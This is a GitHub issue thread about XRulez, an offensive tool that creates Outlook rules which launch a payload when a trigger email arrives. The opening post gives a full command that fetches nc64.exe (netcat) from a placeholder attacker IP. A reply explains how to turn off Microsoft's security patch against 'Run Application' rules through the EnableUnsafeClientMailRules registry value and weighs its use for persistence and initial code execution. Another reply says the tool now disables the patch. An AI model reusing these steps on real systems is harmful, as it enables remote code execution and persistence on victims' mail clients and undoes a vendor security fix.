### ISSUE TITLE
Error while creating new rule

### ISSUE THREAD

**Issue by tanujain** [mwrlabs/XRulez#6]
I am running the tool as XRulez_h64e.exe -a --profile Outlook --name myspam --trigger spam --payload http://<ip>/nc64.exe on Windows 10 system for outlook Office 365 MSO 64 bit but I am getting the below error. What could be the reason for it?
<img width="939" alt="screen shot 2018-11-13 at 11 31 44 am" src="https://user-images.githubusercontent.com/2994184/48437999-c3438600-e737-11e8-846e-fe847074bddf.png">

**Comment by nmonkee** [comment]
There is a security update for Outlook 2013 and Outlook 2016 that disables both "Run Application" and "Run Script" rules by default.

Outlook 2013: https://support.microsoft.com/en-us/help/3191938/descriptionofthesecurityupdateforoutlook2013june13,2017

Outlook 2016: https://support.microsoft.com/en-us/help/3191883/may-2-2017-update-for-outlook-2016-kb3191883

The 'fix' disables the rule actions to start an application or run a macro in Outlook 2013/2016. However you can simply enable them by setting the "EnableUnsafeClientMailRules" registry value:

HKEY_CURRENT_USER\Software\Microsoft\Office\[14.0][15.0][16.0]\Outlook\Security
DWORD: EnableUnsafeClientMailRules
Value: 1

Ref: KB3191893.

https://support.microsoft.com/en-us/help/3191893/how-to-control-the-rule-actions-to-start-an-application-or-run-a-macro

https://www.slipstick.com/outlook/rules/outlook-2016-run-a-script-rules

As HKCU, should be able to re-enable. Problematic for persistence on VDI for example, also a blocker for remote vector for initial code execution. However still valid and useful for persistence on host (non VDI).

**Comment by jaSzmigi** [comment]
Added disabling of mentioned security patches.
